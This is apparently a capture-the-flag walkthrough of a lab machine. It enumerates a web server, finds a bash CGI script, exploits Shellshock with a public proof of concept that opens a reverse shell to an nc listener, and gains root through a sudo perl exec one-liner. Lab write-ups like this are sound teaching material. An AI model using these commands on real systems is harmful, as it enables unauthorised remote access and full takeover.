Enumeration
Start with an nmap service scan of the target (10.10.10.56).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Only two ports are open: HTTP on 80 and SSH on the non-standard port 2222.
The web server is the larger attack surface, so check it first.
The page shows nothing but an image captioned Don't Bug me!, and neither the page nor its source contains anything useful.
The interesting content must be somewhere the site does not link to, so enumerate directories.
Directory brute-forcing turns up /cgi-bin/. Note the trailing slash: Apache answers 403 for /cgi-bin/ but 404 for /cgi-bin, so a wordlist run that does not append slashes (gobuster's -f) can miss it entirely.
CGI (Common Gateway Interface) is the specification by which a web server runs an external program to answer a request: the server hands the request to the program through environment variables (the path, the query string, and every request header as HTTP_<NAME>, e.g. HTTP_USER_AGENT) and standard input, and sends whatever the program writes to standard output back as the HTTP response.
In Apache, cgi-bin is the ScriptAlias directory: files placed there are executed rather than served as static content, so every file in it is a program the server will run for anyone who requests it.
Since everything in that directory is executed on request, enumerate it for scripts, adding the extensions CGI scripts usually carry.
gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x sh,cgi
/user.sh
One script is found: user.sh.
Requesting it returns the machine's uptime, so it is a bash script run by Apache's mod_cgi. Bash plus CGI immediately suggests CVE-2014-6271 (Shellshock): vulnerable bash versions import function definitions from environment variables and also execute any commands appended after the function body, and mod_cgi puts attacker-controlled request headers such as User-Agent into exactly those environment variables.
A public GitHub proof of concept automates this, so I cloned it.
user flag
Start a netcat listener first, then run the PoC with the listener's address and port (replace lhost and lport) and the URL of the CGI script.
python3 shellshock.py lhost lport http://10.10.10.56/cgi-bin/user.sh
The listener, started in another terminal before the PoC is run:
nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.56] 53876
whoami
shelly
It worked: we have a shell as shelly.
The user flag is in shelly's home directory.
root flag
Next, escalate privileges to reach the root flag. The first check is always what sudo allows:
sudo -l
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
shelly can run /usr/bin/perl as root without a password.
Perl can exec a shell, and because sudo runs the interpreter as root, the shell it spawns is root too. The one-liner is listed on GTFOBins:
sudo perl -e 'exec "/bin/sh";'
whoami
root
We are root.
The root flag is in /root.